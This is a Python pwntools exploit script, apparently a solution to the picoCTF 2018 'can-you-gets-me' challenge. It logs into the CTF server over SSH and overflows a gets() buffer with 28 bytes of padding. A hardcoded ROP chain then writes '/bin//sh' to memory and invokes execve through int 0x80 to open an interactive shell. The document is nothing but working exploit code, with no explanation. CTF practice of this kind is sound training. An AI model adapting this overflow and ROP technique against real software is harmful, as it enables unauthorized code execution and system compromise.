from pwn import *from struct import packremoteShell = ssh(host = '2018sh

1. from pwn import *
2.  
3. from struct import pack
4.  
5. remoteShell = ssh(host = '2018shell1.picoctf.com', user=sys.argv[1], password=sys.argv[2])
6. remoteShell.set_working_directory('/problems/can-you-gets-me_0_8ac5bddeab74e647cd6d31642246a12a')
7. process = remoteShell.process('./gets')
8.  
9. p = 'A' * 28
10.  
11. p += pack('<I', 0x0806f02a) # pop edx ; ret
12. p += pack('<I', 0x080ea060) # @ .data
13. p += pack('<I', 0x080b81c6) # pop eax ; ret
14. p += '/bin'
15. p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
16. p += pack('<I', 0x0806f02a) # pop edx ; ret
17. p += pack('<I', 0x080ea064) # @ .data + 4
18. p += pack('<I', 0x080b81c6) # pop eax ; ret
19. p += '//sh'
20. p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
21. p += pack('<I', 0x0806f02a) # pop edx ; ret
22. p += pack('<I', 0x080ea068) # @ .data + 8
23. p += pack('<I', 0x08049303) # xor eax, eax ; ret
24. p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
25. p += pack('<I', 0x080481c9) # pop ebx ; ret
26. p += pack('<I', 0x080ea060) # @ .data
27. p += pack('<I', 0x080de955) # pop ecx ; ret
28. p += pack('<I', 0x080ea068) # @ .data + 8
29. p += pack('<I', 0x0806f02a) # pop edx ; ret
30. p += pack('<I', 0x080ea068) # @ .data + 8
31. p += pack('<I', 0x08049303) # xor eax, eax ; ret
32. p += pack('<I', 0x0807a86f) # inc eax ; ret
33. p += pack('<I', 0x0807a86f) # inc eax ; ret
34. p += pack('<I', 0x0807a86f) # inc eax ; ret
35. p += pack('<I', 0x0807a86f) # inc eax ; ret
36. p += pack('<I', 0x0807a86f) # inc eax ; ret
37. p += pack('<I', 0x0807a86f) # inc eax ; ret
38. p += pack('<I', 0x0807a86f) # inc eax ; ret
39. p += pack('<I', 0x0807a86f) # inc eax ; ret
40. p += pack('<I', 0x0807a86f) # inc eax ; ret
41. p += pack('<I', 0x0807a86f) # inc eax ; ret
42. p += pack('<I', 0x0807a86f) # inc eax ; ret
43. p += pack('<I', 0x0806cc25) # int 0x80
44.  
45. process.sendlineafter('!', p)
46. process.interactive()